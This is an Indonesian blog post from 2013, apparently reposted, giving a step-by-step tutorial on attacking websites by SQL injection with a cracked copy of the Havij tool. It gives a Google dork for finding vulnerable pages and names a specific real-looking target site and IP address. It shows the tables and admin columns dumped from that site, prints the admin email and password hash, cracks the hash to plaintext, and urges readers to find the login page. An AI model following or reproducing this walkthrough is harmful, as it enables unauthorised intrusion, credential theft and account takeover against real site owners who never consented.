Tutorial SQL Injection Menggunakan Tools Havij

Kemarn saya sudah share Tools Havij 1.15 Pro version [Cracked] . Kali ini saya akan share cara menggunakan Havij tersebut untuk menemukan password web target dengan SQLi .
Oke, langsung saja kita mulai ritualnya :

Pertama, cari target lewat google dork.
Google Dork : inurl:"pages.php?id="
Lalu kita pilih salah satu target. Untuk percobaan, saya pilih target : http://www.radiesse-voice.com/pages.php?id=15
Step 1

Kita masukkan alamat tersebut ke kolom target yang ada di Havij lalu klik analyze . tungu sampai kolom paling bawah bertuliskan Status : I'm IDLE

Maka kita akan mendapat data-data sebagai berikut :

Host IP: 65.98.217.75
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.17
Keyword Found: Billing
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 7
Valid String Column is 3
Current DB: radiesse

Oke, lanjut ke step 2 : Klik Tables lalu kik Get Tables

Step 2

Maka akan keluar kolom baru yaitu rad_admin, rad_news, rad_page . Karena kita ingin mencari akses admin, kita coba kolom rad_admin. centang kolom rad_admin lalu klik get columns
Step 3
Oke, hampir berhasil. Kita menemukan kolom : admin_id, admin_email, admin_pass, admin_passo
Kita coba lihat isi dari admin_id , admin_email, admin_pass . Centang admin_id , admin_email, admin_pass lalu klik get data
step 4
Setelah selesai, kita lihat di kolom bawah. Kita mendapatkan data sebagai berikut : Data Found: admin_id,admin_email,admin_pass=1^admin@radiesse.com^f97c5d29941bfb1b2fdab0874906ab82
Admin ID : 1
Admin Email : admin@radiesse.com
Admin Password : f97c5d29941bfb1b2fdab0874906ab82
namun password belum di encrypt. Maka kita encrypt menggunakan fitur MD5. 
Dan kita mendapatkan data sebagai berikut : Plain text of f97c5d29941bfb1b2fdab0874906ab82 is one . Jadi passwordnya adalah one.
Sampai disini semua beres. Tinggal nyari admin loginnya. Karena ini butuh waktu yang lama, cari sendiri-sendiri aja ya Admin Loginnya. Gunakan Fitur Find Admin
Oke, sekian tutorial kali ini, selamat mencoba. 
Sumber:http://www.madura-cyber.org/2013/02/tutorial-sql-injection-menggunakan.html
Anda baru saja membaca artikel yang berkategori dengan judul Tutorial SQL Injection Menggunakan Tools Havij . Anda bisa bookmark halaman ini dengan URL http://my-husni.blogspot.com/2013/06/tutorial-sql-injection-menggunakan.html. Terima kasih!
Ditulis oleh: Admin - Monday, June 3, 2013

Belum ada komentar untuk "Tutorial SQL Injection Menggunakan Tools Havij "

Post a Comment